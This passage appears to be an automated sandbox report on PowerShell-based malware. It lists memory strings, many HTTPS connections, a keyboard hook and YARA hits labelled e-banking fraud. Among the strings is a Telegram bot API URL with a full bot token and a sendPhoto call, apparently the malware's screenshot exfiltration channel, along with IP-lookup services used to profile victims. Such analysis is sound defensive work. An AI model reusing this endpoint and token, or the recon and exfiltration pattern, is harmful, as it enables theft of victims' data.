                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.datacontract.org
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26AC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26AC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.datacontract.org/2004/07/Logger
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE20F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022547481000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE20F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022547481000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE25DC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE25DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1599632881.000001BEFA600000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org/
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1599632881.000001BEFA600000.00000004.08000000.00040000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1598957271.000001BEFA4CA000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot7813041927:AAFJKTwPluPESj-jsG5TWsi6m7BDKrgz_Rk/sendPhoto?chat_id=-463031
                      Source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/mgravell/protobuf-net6
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F81197000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2644000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE2883000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1599632881.000001BEFA600000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://ipwho.is/SSELECT
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2644000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.isp
                      Source: powershell.exe, 00000005.00000002.1386901887.0000027F90081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F81B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1583652727.000001BEF2163000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.10:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.10:49788 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49793 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49850 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49902 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49928 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49957 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49983 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49988 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49989 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49991 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49992 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49993 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49994 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49995 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49996 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49997 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49998 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:49999 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50000 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50001 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50002 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50003 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50004 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50005 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50006 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50007 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50008 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50009 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50010 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50011 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50012 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50013 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50014 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50015 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50016 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50017 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50018 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50019 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50020 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50021 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50022 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50023 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50024 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50025 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50026 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50027 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50028 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50029 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50030 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50031 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50032 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50033 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50034 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50035 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50036 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50037 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50038 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50039 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50040 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50041 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50042 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50043 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50044 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50045 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50046 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50047 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50048 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50049 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50050 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50051 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50052 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50053 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50054 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50055 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50056 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50057 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50058 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.124.205.6:443 -> 192.168.2.10:50059 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      E-Banking Fraud

                      Source: Yara matchFile source: 8.2.powershell.exe.225576fb380.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576d3348.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576d3348.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255fa80000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576fb380.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE
